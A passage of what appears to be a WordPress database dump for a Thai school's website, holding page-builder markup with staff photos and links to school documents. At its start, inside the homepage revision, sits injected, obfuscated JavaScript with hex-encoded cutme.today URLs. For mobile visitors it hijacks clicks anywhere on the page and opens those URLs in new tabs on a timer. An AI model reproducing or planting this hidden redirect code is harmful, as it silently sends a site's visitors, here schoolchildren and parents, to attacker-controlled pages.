_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 15:00:23','2025-07-15 08:00:23','',19,'http://watprato.ssk.in.th/?p=696',0,'revision','',0),
(697,1,'2025-07-15 15:07:38','2025-07-15 08:07:38','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- 